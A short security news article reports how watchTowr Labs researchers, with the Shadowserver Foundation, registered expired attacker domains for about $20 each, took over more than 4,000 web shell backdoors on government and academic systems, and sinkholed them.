Hackers’ Abandoned Domains Expose 4,000 Active Backdoors for Just $20 Each

Hackers' Abandoned Domains Expose 4,000 Active Backdoors for Just $20 Each

Web Backdoor Hijacking Exposes Global Security Vulnerabilities

Security researchers at watchTowr Labs have successfully hijacked over 4,000 web backdoors by acquiring abandoned domain infrastructure for minimal cost. The operation, conducted in collaboration with the Shadowserver Foundation, involved registering more than 40 domain names previously used by threat actors for command-and-control operations.

The compromised targets included government entities from Bangladesh, China, and Nigeria, as well as academic institutions across Asia. The hijacked backdoors consisted of various web shells, including:
– Simple PHP-based command execution tools
– c99shell and r57shell (feature-rich shells with extensive capabilities)
– China Chopper (commonly used by Chinese APT groups)

Key Findings:
– Some web shells were found to be backdoored by their own maintainers
– Compromised systems included government, military, and educational institutions
– The operation cost as little as $20 per domain
– Over 135,000 unique systems were identified still communicating with legacy domains

The research highlighted a significant security oversight: many attackers failed to maintain their infrastructure, leaving their tools vulnerable to takeover. This discovery demonstrates that threat actors are susceptible to the same security mistakes as defenders, including expired domains and the use of compromised software.

The affected domains have since been sinkholed to prevent malicious exploitation, while the findings underscore the importance of proper domain management and security infrastructure maintenance.

Share This Article